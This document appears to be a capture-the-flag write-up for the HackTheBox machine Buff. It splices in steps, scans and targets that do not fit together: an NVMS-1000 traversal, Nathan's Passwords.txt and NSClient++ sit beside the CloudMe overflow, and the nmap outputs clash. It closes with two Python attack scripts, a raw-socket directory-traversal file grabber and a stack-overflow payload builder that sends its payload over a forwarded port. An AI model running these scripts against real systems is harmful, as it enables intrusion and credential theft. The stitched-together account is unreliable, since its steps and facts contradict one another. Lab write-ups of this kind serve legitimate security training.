This is a writeup about a retired HackTheBox machine: Buff, published on July 18 2020 by egotisticalSW. The box is classified as an easy machine.

Buff is a fairly easy box highlighting the basics of enumeration: we discover a website running vulnerable software and exploit it with a publicly available exploit to get remote code execution on the box. It is built around two CVEs. The PHP web app hosted on port 8080 is vulnerable to an unauthenticated remote code execution, and that exploit gives the first shell. A binary, CloudMe.exe, listens on a local port and is vulnerable to a buffer overflow; exploiting it gives a shell as Administrator. The first thing that might come to mind when you see the machine name is a buffer overflow; if that is the case, you have just guessed the procedure to obtain root on this machine. The user part only requires exploiting a CVE. The root part first requires a pivot to reach the box's internal services, then exploiting another CVE.

Enumeration

sudo nmap -sS -T4 -p- 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.016s latency).
Not shown: 65516 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5040/tcp open  unknown
5666/tcp open  nrpe
6063/tcp open  x11
6699/tcp open  napster
7680/tcp open  pando-pub
…

The nmap scan showed that port 445 is open for SMB.

# Nmap 7.80 scan initiated Wed Apr 15 03:04:29 2020 as: nmap -p- -sSV -oN nmap 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.013s latency).
Not shown: 65515 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         Microsoft ftpd
22/tcp   open  ssh         OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open  http
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
…

Scanned at 2020-12-11 15:46:19 EST for 677s
Not shown: 65516 filtered ports
Reason: 65516 no-responses
PORT     STATE SERVICE       REASON  VERSION
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
…
5040/tcp open  unknown       syn-ack
7680/tcp open  pando-pub?
…

Port 80 (NVMS-1000)

There is a service running on port 80 called NVMS-1000, and it has a login page. We can do a quick searchsploit for NVMS and see that a few exploits pop up:

Command: searchsploit nvms

I searched for possible exploits for the service and got a directory traversal exploit from Exploit-DB … I came up with a directory traversal exploit for that NVMS version that could help me grab the previously mentioned Passwords.txt from Nathan's desktop folder.

I use the Metasploit scanner smb_login to check, based on the password file, whether I can log in over SMB with the username "nathan". We move on by setting the needed options in the Metasploit module and giving it a go: the dots are starting to connect!

The "NSClient++ exploit" hint fits port 5666 (nrpe) in the scan above, the NRPE port that NSClient++ listens on; that is the kind of internal service the root step reaches only after pivoting.

Port 8080 web app and CloudMe (Buff)

We can mirror the exploit to our working directory with searchsploit's -m flag:

Command: searchsploit 48311 -m

The number 48311 is the Exploit-DB ID of the exploit, which is how searchsploit identifies it. Once we have the exploit copied, we can look at the code. Using an exploit to gain a webshell on this Windows server is the starting point for running the CloudMe buffer overflow attack … But I can't think of privilege escalation without having a proper shell … so I just moved on.
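The directory traversal step above is usually scripted against the raw socket rather than through an HTTP library, because client libraries such as requests/urllib3 collapse "../" segments before the request leaves the box and silently defeat the traversal. The following is an added example (not code from any of the writeups quoted on this page) that builds the raw request, sends it to the NVMS-1000 web interface and splits the reply; the target IP and port 80 come from the nmap output above, while the traversal depth, the path Users/Nathan/Desktop/Passwords.txt (the default Windows profile location) and the assumption that the service serves any file reached through "../" are mine.

```python
"""Raw-socket directory traversal fetch against an NVMS-1000-style web service.

Added example, not code from the quoted writeups. Assumptions: the service
returns any file reachable via '../' in the request-target, and the password
file sits at the default profile path Users/Nathan/Desktop/Passwords.txt.
"""
import socket

TARGET = "10.10.10.184"   # host from the page's nmap output
PORT = 80                 # NVMS-1000 web interface


def build_traversal_request(relpath: str, depth: int = 12, host: str = TARGET) -> bytes:
    """Return a hand-built HTTP/1.1 GET whose request-target starts with
    `depth` '../' segments. Built by hand on purpose: urllib3/requests
    remove dot segments from the path before sending, which would turn the
    traversal into a plain request for /Users/... on the web root."""
    target = "../" * depth + relpath.replace("\\", "/").lstrip("/")
    return (
        f"GET {target} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def parse_http_response(raw: bytes):
    """Split a raw HTTP response into (status_code, body_bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator in response")
    status_line = head.split(b"\r\n", 1)[0]
    status = int(status_line.split()[1])
    return status, body


def fetch_file(relpath: str, host: str = TARGET, port: int = PORT, timeout: float = 5.0):
    """Send the traversal request and return (status, body) from the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_traversal_request(relpath, host=host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_http_response(b"".join(chunks))


if __name__ == "__main__":
    status, body = fetch_file("Users/Nathan/Desktop/Passwords.txt")
    print(f"HTTP {status}")
    print(body.decode(errors="replace"))
```

A 200 with the file contents confirms the traversal; a 404 or an empty body usually means the depth is too small or the path guess is wrong, so vary `depth` and try a file that is certain to exist (such as Windows/win.ini) before hunting for the real one.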
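The CloudMe step is a classic stack overflow against a service that only listens on the loopback interface, which is why the page says root needs a pivot first. As an added example (not the exploit from any writeup quoted here), the block below assembles the usual payload layout, padding up to the saved return address, a 32-bit little-endian overwrite pointing at a "jmp esp" gadget, a NOP sled and the shellcode, and sends it through a local port forward. Every number in it is a placeholder: the offset 1052, the gadget address 0x12345678, the bad-character set, and the assumption that the tunnel exposes CloudMe on 127.0.0.1:8888 must all be replaced with values found in a debugger against the real binary.

```python
"""Assemble and deliver a stack-overflow payload of the shape used against
CloudMe: padding | saved-EIP overwrite | NOP sled | shellcode.

Added example, not code from the quoted writeups. OFFSET, JMP_ESP, BADCHARS
and the forwarded port are hypothetical placeholders for illustration.
"""
import socket
import struct

OFFSET = 1052                 # hypothetical distance from buffer start to saved EIP
JMP_ESP = 0x12345678          # hypothetical address of a 'jmp esp' gadget (32-bit process assumed)
BADCHARS = b"\x00\x0a\x0d"    # hypothetical bytes the service mangles
# CloudMe listens on localhost only; the pivot (ssh -L / chisel) is assumed to
# forward it to this local endpoint.
LOCAL_HOST, LOCAL_PORT = "127.0.0.1", 8888


def check_badchars(blob: bytes, bad: bytes = BADCHARS) -> list:
    """Return the bad byte values present in `blob` (empty list if clean)."""
    return [b for b in bad if b in blob]


def build_overflow_payload(shellcode: bytes, offset: int = OFFSET, ret: int = JMP_ESP,
                           sled: int = 16, filler: bytes = b"A") -> bytes:
    """Lay out filler up to the saved return address, overwrite it with `ret`
    (little-endian, so 'jmp esp' lands after the overwritten EIP where ESP
    points at the sled), then the NOP sled and the shellcode."""
    eip = struct.pack("<I", ret)
    for name, blob in (("return address", eip), ("shellcode", shellcode)):
        bad = check_badchars(blob)
        if bad:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in bad]}")
    return filler * offset + eip + b"\x90" * sled + shellcode


def send_payload(payload: bytes, host: str = LOCAL_HOST, port: int = LOCAL_PORT) -> int:
    """Deliver the payload over the forwarded port; returns bytes sent."""
    with socket.create_connection((host, port), timeout=5.0) as s:
        s.sendall(payload)
    return len(payload)


if __name__ == "__main__":
    # Constructed placeholder shellcode (int3 sled); replace with msfvenom output
    # generated with the same bad-character list.
    shellcode = b"\xcc" * 32
    payload = build_overflow_payload(shellcode)
    print(f"sending {len(payload)} bytes, EIP at offset {OFFSET}")
    send_payload(payload)
```

Keeping the bad-character check on both the return address and the shellcode catches the most common reason a payload that "should" work crashes the service without giving a shell: a gadget address or encoder output that happens to contain a byte the parser drops.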